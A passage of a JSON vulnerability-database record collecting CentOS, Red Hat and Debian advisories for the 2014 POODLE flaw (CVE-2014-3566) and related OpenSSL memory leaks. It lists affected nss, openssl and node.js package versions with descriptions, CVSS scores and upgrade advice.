"nss-tools-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "i686", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-2.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "i686", "packageName": "nss-softokn-freebl", "packageFilename": "nss-softokn-freebl-3.16.2.3-1.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "i686", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-2.el6_6", "arch": "any", "packageName": "nss-util", "packageFilename": "nss-util-3.16.2.3-2.el6_6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss", "packageFilename": "nss-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-tools", "packageFilename": "nss-tools-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-softokn-devel", "packageFilename": "nss-softokn-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss", "packageFilename": "nss-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-1.el7_0", "arch": "x86_64", "packageName": "nss-util-devel", "packageFilename": "nss-util-devel-3.16.2.3-1.el7_0.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "i386", "packageName": "nss-devel", "packageFilename": "nss-devel-3.16.2.3-1.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "i686", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-2.el7_0.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "x86_64", "packageName": "nss-pkcs11-devel", "packageFilename": "nss-pkcs11-devel-3.16.2.3-3.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "3.16.2.3-3.el6_6", "arch": "any", "packageName": "nss", "packageFilename": "nss-3.16.2.3-3.el6_6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "3.16.2.3-2.el7_0", "arch": "x86_64", "packageName": "nss-sysinit", "packageFilename": "nss-sysinit-3.16.2.3-2.el7_0.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1948\n\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Netscape Portable Runtime (NSPR) provides platform\nindependence for non-GUI operating system facilities.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nThe nss, nss-util, and nss-softokn packages have been upgraded to upstream\nversion 3.16.2.3, which provides a number of bug fixes and enhancements\nover the previous version, and adds the support for Mozilla Firefox 31.3.\n(BZ#1158159, BZ#1165003, BZ#1165525)\n\nUsers of nss, nss-util, and nss-softokn are advised to upgrade to these\nupdated packages, which contain a backported patch to mitigate the\nCVE-2014-3566 issue, fix these bugs, and add these enhancements. After\ninstalling this update, applications using NSS or NSPR must be restarted\nfor this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020795.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020800.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-December/020802.html\n\n**Affected packages:**\nnss\nnss-devel\nnss-pkcs11-devel\nnss-softokn\nnss-softokn-devel\nnss-softokn-freebl\nnss-softokn-freebl-devel\nnss-sysinit\nnss-tools\nnss-util\nnss-util-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1948.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-12-03T22:45:56", "title": "nss security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-12-04T01:19:11", "href": "http://lists.centos.org/pipermail/centos-announce/2014-December/020795.html", "id": "CESA-2014:1948", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-03T18:24:50", "references": ["https://rhn.redhat.com/errata/RHSA-2014-1653.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-31.el5_11.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-31.el5_11.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2014:1653\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the CVE-2014-3566 issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020693.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-October/020696.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1653.html", "edition": 1, "reporter": "CentOS Project", "published": "2014-10-16T15:21:39", "title": "openssl security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-16T17:53:19", "href": "http://lists.centos.org/pipermail/centos-announce/2014-October/020693.html", "id": "CESA-2014:1653", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:58", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "x86_64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.x86_64.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "reporter": "RedHat", "published": "2014-10-22T04:00:00", "type": "redhat", "title": "(RHSA-2014:1692) Important: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2015-04-24T14:20:56", "id": "RHSA-2014:1692", "href": "https://access.redhat.com/errata/RHSA-2014:1692", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:42:44", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "i686", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-30.el6_6.2.i686.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "reporter": "RedHat", "published": "2014-10-16T04:00:00", "type": "redhat", "title": "(RHSA-2014:1652) Important: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:06", "id": "RHSA-2014:1652", "href": "https://access.redhat.com/errata/RHSA-2014:1652", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:41:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.16.2.3-1.el5_11", "arch": "x86_64", "packageName": "nss-debuginfo", "packageFilename": "nss-debuginfo-3.16.2.3-1.el5_11.x86_64.rpm", "operator": "lt"}], "description": "Network Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Netscape Portable Runtime (NSPR) provides platform\nindependence for non-GUI operating system facilities.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nThe nss, nss-util, and nss-softokn packages have been upgraded to upstream\nversion 3.16.2.3, which provides a number of bug fixes and enhancements\nover the previous version, and adds the support for Mozilla Firefox 31.3.\n(BZ#1158159, BZ#1165003, BZ#1165525)\n\nUsers of nss, nss-util, and nss-softokn are advised to upgrade to these\nupdated packages, which contain a backported patch to mitigate the\nCVE-2014-3566 issue, fix these bugs, and add these enhancements. After\ninstalling this update, applications using NSS or NSPR must be restarted\nfor this update to take effect.\n", "reporter": "RedHat", "published": "2014-12-02T05:00:00", "type": "redhat", "title": "(RHSA-2014:1948) Important: nss, nss-util, and nss-softokn security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:07", "id": "RHSA-2014:1948", "href": "https://access.redhat.com/errata/RHSA-2014:1948", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:40:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.22.3.4-1.el6op", "arch": "noarch", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.22.3.4-1.el6op.noarch.rpm", "operator": "lt"}], "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or private\ncloud deployments.\n\nNode.js is a software development platform for building fast and scalable\nnetwork applications in the JavaScript programming language.\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting\nmessages encrypted using block ciphers in cipher block chaining (CBC) mode.\nThis flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected\nbyte of a cipher text in as few as 256 tries if they are able to force a\nvictim application to repeatedly send the same data over newly created SSL\n3.0 connections. (CVE-2014-3566)\n\nAll OpenShift Enterprise users are advised to upgrade to these updated\npackages, which correct this issue.\n", "reporter": "RedHat", "published": "2015-08-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1545) Important: node.js security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:57:38", "id": "RHSA-2015:1545", "href": "https://access.redhat.com/errata/RHSA-2015:1545", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T17:42:11", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.i686.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the CVE-2014-3566 issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "reporter": "RedHat", "published": "2014-10-16T04:00:00", "type": "redhat", "title": "(RHSA-2014:1653) Moderate: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:13:46", "id": "RHSA-2014:1653", "href": "https://access.redhat.com/errata/RHSA-2014:1653", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T19:41:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.16.4.2-1.el6op", "arch": "noarch", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.16.4.2-1.el6op.noarch.rpm", "operator": "lt"}], "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or private\ncloud deployments.\n\nNode.js is a software development platform for building fast and scalable\nnetwork applications in the JavaScript programming language.\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting\nmessages encrypted using block ciphers in cipher block chaining (CBC) mode.\nThis flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected\nbyte of a cipher text in as few as 256 tries if they are able to force a\nvictim application to repeatedly send the same data over newly created SSL\n3.0 connections. (CVE-2014-3566)\n\nAll OpenShift Enterprise users are advised to upgrade to these updated\npackages, which correct this issue.\n", "reporter": "RedHat", "published": "2015-08-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1546) Important: node.js security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T02:48:21", "id": "RHSA-2015:1546", "href": "https://access.redhat.com/errata/RHSA-2015:1546", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "debian": [{"lastseen": "2018-10-18T13:49:11", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.0.1e-2+deb7u13", "arch": "all", "packageFilename": "openssl_1.0.1e-2+deb7u13_all.deb", "packageName": "openssl", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3053-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 16, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-3513 CVE-2014-3566 CVE-2014-3567 CVE-2014-3568\n\nSeveral vulnerabilities have been found in OpenSSL, the Secure Sockets\nLayer library and toolkit.\n\nCVE-2014-3513\n\n A memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\n Real-time Transport Protocol (SRTP) extension data. A remote attacker\n could send multiple specially crafted handshake messages to exhaust\n all available memory of an SSL/TLS or DTLS server.\n\nCVE-2014-3566 (&quot;POODLE&quot;)\n\n A flaw was found in the way SSL 3.0 handled padding bytes when\n decrypting messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM)\n attacker to decrypt a selected byte of a cipher 